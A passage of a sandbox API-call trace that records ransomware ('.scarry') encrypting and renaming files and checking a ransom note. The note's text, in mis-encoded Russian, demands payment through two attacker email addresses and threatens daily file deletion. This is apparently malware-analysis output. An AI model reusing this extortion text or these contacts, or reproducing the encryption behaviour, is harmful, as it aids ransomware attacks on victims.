0x19c [0111.091] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0111.091] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x93f6e [0111.091] SetFilePointer (in: 
hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0111.091] ReadFile (in: hFile=0x19c, lpBuffer=0x1e79f08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08*, lpNumberOfBytesRead=0x18ea34*=0x4000, lpOverlapped=0x0) returned 1 [0111.123] GlobalLock (hMem=0x45000c) returned 0x591988 [0111.123] GlobalLock (hMem=0x450004) returned 0x597998 [0111.123] GlobalHandle (pMem=0x597998) returned 0x450004 [0111.123] GlobalUnlock (hMem=0x450004) returned 0 [0111.123] GlobalReAlloc (hMem=0x450004, dwBytes=0x4000, uFlags=0x2) returned 0x450004 [0111.123] GlobalLock (hMem=0x450004) returned 0x597998 [0111.123] GlobalHandle (pMem=0x597998) returned 0x450004 [0111.123] GlobalUnlock (hMem=0x450004) returned 0 [0111.123] GlobalReAlloc (hMem=0x450004, dwBytes=0x6000, uFlags=0x2) returned 0x450004 [0111.123] GlobalLock (hMem=0x450004) returned 0x597998 [0111.123] GlobalHandle (pMem=0x591988) returned 0x45000c [0111.123] GlobalUnlock (hMem=0x45000c) returned 0 [0111.127] GlobalHandle (pMem=0x597998) returned 0x450004 [0111.127] GlobalUnlock (hMem=0x450004) returned 0 [0111.128] GlobalLock (hMem=0x450004) returned 0x591988 [0111.128] GlobalHandle (pMem=0x591988) returned 0x450004 [0111.128] GlobalUnlock (hMem=0x450004) returned 0 [0111.128] GlobalReAlloc (hMem=0x450004, dwBytes=0x6000, uFlags=0x2) returned 0x450004 [0111.128] GlobalLock (hMem=0x450004) returned 0x591988 [0111.128] GlobalHandle (pMem=0x591988) returned 0x450004 [0111.128] GlobalUnlock (hMem=0x450004) returned 0 [0111.128] ReadFile (in: hFile=0x19c, lpBuffer=0x1e4d360, nNumberOfBytesToRead=0x18, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e4d360*, lpNumberOfBytesRead=0x18ea34*=0x18, lpOverlapped=0x0) returned 1 [0111.136] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea28*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea28*=0) 
returned 0x0 [0111.136] WriteFile (in: hFile=0x19c, lpBuffer=0x1e79f08*, nNumberOfBytesToWrite=0x4018, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08*, lpNumberOfBytesWritten=0x18ea30*=0x4018, lpOverlapped=0x0) returned 1 [0111.137] SetFilePointer (in: hFile=0x19c, lDistanceToMove=606062, lpDistanceToMoveHigh=0x18ea28*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea28*=0) returned 0x93f6e [0111.137] WriteFile (in: hFile=0x19c, lpBuffer=0x1e4d360*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1e4d360*, lpNumberOfBytesWritten=0x18ea30*=0x18, lpOverlapped=0x0) returned 1 [0111.249] WriteFile (in: hFile=0x19c, lpBuffer=0x18eaac*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x18eaac*, lpNumberOfBytesWritten=0x18ea30*=0x8, lpOverlapped=0x0) returned 1 [0111.251] WriteFile (in: hFile=0x19c, lpBuffer=0x1ea1d28*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1ea1d28*, lpNumberOfBytesWritten=0x18ea30*=0x1, lpOverlapped=0x0) returned 1 [0111.386] WriteFile (in: hFile=0x19c, lpBuffer=0x1e79f28*, nNumberOfBytesToWrite=0x9c, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1e79f28*, lpNumberOfBytesWritten=0x18ea30*=0x9c, lpOverlapped=0x0) returned 1 [0111.387] CloseHandle (hObject=0x19c) returned 1 [0111.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e7e018, cbMultiByte=39, lpWideCharStr=0x18da40, cchWideChar=2047 | out: lpWideCharStr="SvG0NemYVfELxl1tDK=ZzW0vMjeeJo9P.scarry") returned 39 [0111.465] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\SvG0NemYVfELxl1tDK=ZzW0vMjeeJo9P.scarry" (normalized: "c:\\program files\\common 
files\\microsoft shared\\grphflt\\svg0nemyvfelxl1tdk=zzw0vmjeejo9p.scarry")) returned 1 [0111.466] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\SvG0NemYVfELxl1tDK=ZzW0vMjeeJo9P.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\svg0nemyvfelxl1tdk=zzw0vmjeejo9p.scarry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0111.466] SetFileTime (hFile=0x19c, lpCreationTime=0x18ead0, lpLastAccessTime=0x18eac8, lpLastWriteTime=0x18eac0) returned 1 [0111.466] CloseHandle (hObject=0x19c) returned 1 [0111.466] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\SvG0NemYVfELxl1tDK=ZzW0vMjeeJo9P.scarry", dwFileAttributes=0x20) returned 1 [0111.467] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ab98, cbMultiByte=36, lpWideCharStr=0x18dd68, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT\x18\x03") returned 36 [0111.467] GlobalLock (hMem=0x450004) returned 0x591988 [0111.487] GlobalHandle (pMem=0x591988) returned 0x450004 [0111.487] GlobalUnlock (hMem=0x450004) returned 0 [0111.487] GlobalLock (hMem=0x450004) returned 0x591988 [0111.487] GlobalLock (hMem=0x45000c) returned 0x593998 [0111.487] GlobalHandle (pMem=0x591988) returned 0x450004 [0111.487] GlobalUnlock (hMem=0x450004) returned 0 [0111.487] GlobalHandle (pMem=0x593998) returned 0x45000c [0111.487] GlobalUnlock (hMem=0x45000c) returned 0 [0111.487] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}\r\n\r\nÂàøè äîêóìåíòû, ôîòîãðàôèè, áàçû äàííûõ è äðóãèå âàæíûå ôàéëû áûëè çàøèôðîâàíû. 
\r\nÊàæäûå 24 ÷àñà óäàëÿþòñÿ 24 ôàéëà, íåîáõîäèìî ïðèñëàòü ñâîé èäåíòèôèêàòîð ÷òîá ìû îòêëþ÷èëè ýòó ôóíêöèþ.\r\nÊàæäûå 24 ÷àñà ñòîèìîñòü ðàñøèôðîâêè äàííûõ óâåëè÷èâàåòñÿ íà 30% (÷åðåç 72 ÷àñà ñóììà ôèêñèðóåòñÿ)\r\n\r\nÄëÿ ðàñøèôðîâêè äàííûõ:\r\n\r\nÍàïèøèòå íà ïî÷òó - scarry38@horsefucker.org\r\n \r\n * ïèñüìå óêàçàòü Âàø ëè÷íûé èäåíòèôèêàòîð\r\n *Ïðèêðåïèòå 2 ôàéëà äî 1 ìá äëÿ òåñòîâîé ðàñøèôðîâêè. \r\n ìû èõ ðàñøèôðóåì, â êà÷åñòâå äîêàçàòåëüñòâà, ÷òî ÒÎËÜÊÎ ÌÛ ìîæåì ðàñøèôðîâàòü ôàéëû.\r\n\r\nÂÀÆÍÎ! Íå ïèøèòå ñ mail.ru (ê íàì íå äîõîäÿò ïèüñìà) Èñïîëüçóéòå - yandex.ru gmail.com è ò.ä. \r\nÂñå êðîìå mail.ru\r\n\r\n -×åì áûñòðåå âû ñîîáùèòå íàì ñâîé èäåíòèôèêàòîð, òåì áûñòðåå ìû âûêëþ÷èì ïðîèçâîëüíîå óäàëåíèå ôàéëîâ.\r\n -Íàïèñàâ íàì íà ïî÷òó âû ïîëó÷èòå äàëüíåéøèå èíñòðóêöèè ïî îïëàòå.\r\n\r\n îòâåòíîì ïèñüìå Âû ïîëó÷èòå ïðîãðàììó äëÿ ðàñøèôðîâêè.\r\nÏîñëå çàïóñêà ïðîãðàììû-äåøèôðîâùèêà âñå Âàøè ôàéëû áóäóò âîññòàíîâëåíû.\r\n\r\nÌû ãàðàíòèðóåì:\r\n100% óñïåøíîå âîññòàíîâëåíèå âñåõ âàøèõ ôàéëîâ\r\n100% ãàðàíòèþ ñîîòâåòñòâèÿ\r\n100% áåçîïàñíûé è íàäåæíûé ñåðâèñ\r\n\r\nÂíèìàíèå!\r\n * Íå ïûòàéòåñü óäàëèòü ïðîãðàììó èëè çàïóñêàòü àíòèâèðóñíûå ñðåäñòâà\r\n * Ïîïûòêè ñàìîñòîÿòåëüíîé ðàñøèôðîâêè ôàéëîâ ïðèâåäóò ê ïîòåðå Âàøèõ äàííûõ\r\n * Äåøèôðàòîðû äðóãèõ ïîëüçîâàòåëåé íåñîâìåñòèìû ñ Âàøèìè äàííûìè, òàê êàê ó êàæäîãî ïîëüçîâàòåëÿ\r\nóíèêàëüíûé êëþ÷ øèôðîâàíèÿ\r\n\r\n Åñëè âàì íå îòâåòèëè â òå÷åíèè 24õ ÷àñîâ, ïèøèòå íà ðåçåðâíóþ ïî÷òó - black8201@protonmail.com\r\n====================================================================================================\r\n\r\nÂàø ëè÷íûé èäåíòèôèêàòîð\r\n\r\n{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0111.487] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0111.487] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå 
ôàéëîâ.TXT", lpFindFileData=0x18eb1c | out: lpFindFileData=0x18eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe872300, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xfe872300, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfe872300, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0xdf9, dwReserved0=0xe80020c8, dwReserved1=0x402, cFileName="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", cAlternateFileName="D407~1.TXT")) returned 0x58b060 [0111.488] FileTimeToLocalFileTime (in: lpFileTime=0x18eb30, lpLocalFileTime=0x18eab0 | out: lpLocalFileTime=0x18eab0) returned 1 [0111.488] FileTimeToDosDateTime (in: lpFileTime=0x18eab0, lpFatDate=0x18eafe, lpFatTime=0x18eafc | out: lpFatDate=0x18eafe, lpFatTime=0x18eafc) returned 1 [0111.488] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0111.488] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0111.488] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0111.488] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0xdf9 [0111.488] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0111.488] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0111.488] 
SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0xdf9 [0111.489] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0111.489] ReadFile (in: hFile=0x19c, lpBuffer=0x1e7ad38, nNumberOfBytesToRead=0xdf9, lpNumberOfBytesRead=0x18ed28, lpOverlapped=0x0 | out: lpBuffer=0x1e7ad38*, lpNumberOfBytesRead=0x18ed28*=0xdf9, lpOverlapped=0x0) returned 1 [0111.489] CloseHandle (hObject=0x19c) returned 1 [0111.489] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0xadf90, dwReserved0=0x0, dwReserved1=0x0, cFileName="EPSIMP32.FLT", cAlternateFileName="")) returned 1 [0111.489] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0111.489] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0111.489] GlobalLock (hMem=0x45000c) returned 0x591988 [0111.489] GlobalHandle (pMem=0x591988) returned 0x45000c [0111.489] GlobalUnlock (hMem=0x45000c) returned 0 [0111.489] GlobalLock (hMem=0x45000c) returned 0x591988 [0111.489] GlobalLock (hMem=0x450004) returned 0x593998 [0111.489] GlobalHandle (pMem=0x591988) returned 0x45000c [0111.490] GlobalUnlock (hMem=0x45000c) returned 0 [0111.490] GlobalHandle (pMem=0x593998) returned 0x450004 [0111.490] GlobalUnlock (hMem=0x450004) returned 0 [0111.490] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, 
lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0111.490] CharLowerBuffW (in: lpsz="EPSIMP32.FLT", cchLength=0xc | out: lpsz="epsimp32.flt") returned 0xc [0111.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0111.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2í\x18", lpUsedDefaultChar=0x0) returned 1 [0111.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3í\x18", lpUsedDefaultChar=0x0) returned 1 [0111.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", 
cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.491] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ií\x18", lpUsedDefaultChar=0x0) returned 1 [0111.491] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.491] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.491] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.491] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ace8, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txtXT\x18\x03") returned 36 [0111.501] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT", cchWideChar=67, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT", lpUsedDefaultChar=0x0) returned 67 [0112.026] CharLowerBuffW (in: lpsz=".FLT", cchLength=0x4 | out: lpsz=".flt") returned 0x4 [0112.026] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".flt", cchWideChar=4, lpMultiByteStr=0x18dd64, 
cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".fltShared\\GRPHFLT\\EPSIMP32.FLT", lpUsedDefaultChar=0x0) returned 4 [0112.026] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT", lpFindFileData=0x18eb04 | out: lpFindFileData=0x18eb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0xadf90, dwReserved0=0x0, dwReserved1=0x0, cFileName="EPSIMP32.FLT", cAlternateFileName="")) returned 0x58b060 [0112.027] FileTimeToLocalFileTime (in: lpFileTime=0x18eb18, lpLocalFileTime=0x18ea30 | out: lpLocalFileTime=0x18ea30) returned 1 [0112.027] FileTimeToDosDateTime (in: lpFileTime=0x18ea30, lpFatDate=0x18eae6, lpFatTime=0x18eae4 | out: lpFatDate=0x18eae6, lpFatTime=0x18eae4) returned 1 [0112.027] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0112.027] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT", dwFileAttributes=0x20) returned 1 [0112.027] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0112.027] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0112.027] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0xadf90 [0112.028] SetFilePointer (in: 
hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0112.028] ReadFile (in: hFile=0x1a4, lpBuffer=0x1e79f08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08*, lpNumberOfBytesRead=0x18ea34*=0x4000, lpOverlapped=0x0) returned 1 [0112.116] GlobalLock (hMem=0x450004) returned 0x591988 [0112.116] GlobalLock (hMem=0x45000c) returned 0x597998 [0112.116] GlobalHandle (pMem=0x597998) returned 0x45000c [0112.116] GlobalUnlock (hMem=0x45000c) returned 0 [0112.116] GlobalReAlloc (hMem=0x45000c, dwBytes=0x4000, uFlags=0x2) returned 0x45000c [0112.116] GlobalLock (hMem=0x45000c) returned 0x597998 [0112.116] GlobalHandle (pMem=0x597998) returned 0x45000c [0112.116] GlobalUnlock (hMem=0x45000c) returned 0 [0112.116] GlobalReAlloc (hMem=0x45000c, dwBytes=0x6000, uFlags=0x2) returned 0x45000c [0112.116] GlobalLock (hMem=0x45000c) returned 0x597998 [0112.117] GlobalHandle (pMem=0x591988) returned 0x450004 [0112.117] GlobalUnlock (hMem=0x450004) returned 0 [0112.119] GlobalHandle (pMem=0x597998) returned 0x45000c [0112.119] GlobalUnlock (hMem=0x45000c) returned 0 [0112.119] GlobalLock (hMem=0x45000c) returned 0x591988 [0112.120] GlobalHandle (pMem=0x591988) returned 0x45000c [0112.120] GlobalUnlock (hMem=0x45000c) returned 0 [0112.120] GlobalReAlloc (hMem=0x45000c, dwBytes=0x6000, uFlags=0x2) returned 0x45000c [0112.120] GlobalLock (hMem=0x45000c) returned 0x591988 [0112.120] GlobalHandle (pMem=0x591988) returned 0x45000c [0112.120] GlobalUnlock (hMem=0x45000c) returned 0 [0112.120] ReadFile (in: hFile=0x1a4, lpBuffer=0x1e4d270, nNumberOfBytesToRead=0x18, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e4d270*, lpNumberOfBytesRead=0x18ea34*=0x18, lpOverlapped=0x0) returned 1 [0112.282] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea28*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea28*=0) 
returned 0x0 [0112.283] WriteFile (in: hFile=0x1a4, lpBuffer=0x1e79f08*, nNumberOfBytesToWrite=0x4018, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08*, lpNumberOfBytesWritten=0x18ea30*=0x4018, lpOverlapped=0x0) returned 1 [0112.283] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=712592, lpDistanceToMoveHigh=0x18ea28*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea28*=0) returned 0xadf90 [0112.283] WriteFile (in: hFile=0x1a4, lpBuffer=0x1e4d270*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1e4d270*, lpNumberOfBytesWritten=0x18ea30*=0x18, lpOverlapped=0x0) returned 1 [0112.306] WriteFile (in: hFile=0x1a4, lpBuffer=0x18eaac*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x18eaac*, lpNumberOfBytesWritten=0x18ea30*=0x8, lpOverlapped=0x0) returned 1 [0112.307] WriteFile (in: hFile=0x1a4, lpBuffer=0x1ea1d18*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1ea1d18*, lpNumberOfBytesWritten=0x18ea30*=0x1, lpOverlapped=0x0) returned 1 Thread: id = 13 os_tid = 0x71c Thread: id = 14 os_tid = 0x23c Thread: id = 16 os_tid = 0x5cc [0060.507] GlobalLock (hMem=0x450004) returned 0x588f38 [0060.507] GlobalHandle (pMem=0x588f38) returned 0x450004 [0060.507] GlobalUnlock (hMem=0x450004) returned 0 [0060.507] GlobalLock (hMem=0x450004) returned 0x588f38 [0060.507] GlobalLock (hMem=0x45000c) returned 0x56f100 [0060.507] GlobalHandle (pMem=0x588f38) returned 0x450004 [0060.507] GlobalUnlock (hMem=0x450004) returned 0 [0060.507] GlobalHandle (pMem=0x56f100) returned 0x45000c [0060.507] GlobalUnlock (hMem=0x45000c) returned 0 [0060.507] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x292fd18, nSize=0x20a | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe")) returned 0x35 [0060.508] CharLowerBuffW (in: 
lpsz="osk.exe", cchLength=0x7 | out: lpsz="osk.exe") returned 0x7 [0060.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="osk.exe", cchWideChar=7, lpMultiByteStr=0x292ef20, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="osk.exe", lpUsedDefaultChar=0x0) returned 7 [0060.508] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0060.508] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0060.508] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32ListFirst") returned 0x76dc5621 [0060.508] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32ListNext") returned 0x76dc56cb [0060.508] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32First") returned 0x76dc5763 [0060.509] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32Next") returned 0x76dc594e [0060.509] GetProcAddress (hModule=0x76d30000, lpProcName="Toolhelp32ReadProcessMemory") returned 0x76dc5b53 [0060.509] GetProcAddress (hModule=0x76d30000, lpProcName="Process32First") returned 0x76d68ae7 [0060.509] GetProcAddress (hModule=0x76d30000, lpProcName="Process32Next") returned 0x76d688a4 [0060.509] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0060.509] GetProcAddress (hModule=0x76d30000, lpProcName="Process32NextW") returned 0x76d6896c [0060.509] GetProcAddress (hModule=0x76d30000, lpProcName="Thread32First") returned 0x76dc5b93 [0060.510] GetProcAddress (hModule=0x76d30000, 